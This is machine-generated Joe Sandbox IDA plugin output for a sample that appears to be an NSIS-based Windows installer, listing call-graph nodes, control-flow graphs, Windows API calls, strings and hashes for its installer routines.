3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 
3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 
4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 
GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 
4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 
3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

Control-flow Graph
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                APIs
                                                                                                • #17.COMCTL32 ref: 004038CE
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                • API String ID: 2435955865-3712954417
                                                                                                • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID: jF
                                                                                                • API String ID: 2295610775-3349280890
                                                                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                • String ID:
                                                                                                • API String ID: 310444273-0
                                                                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                APIs
                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
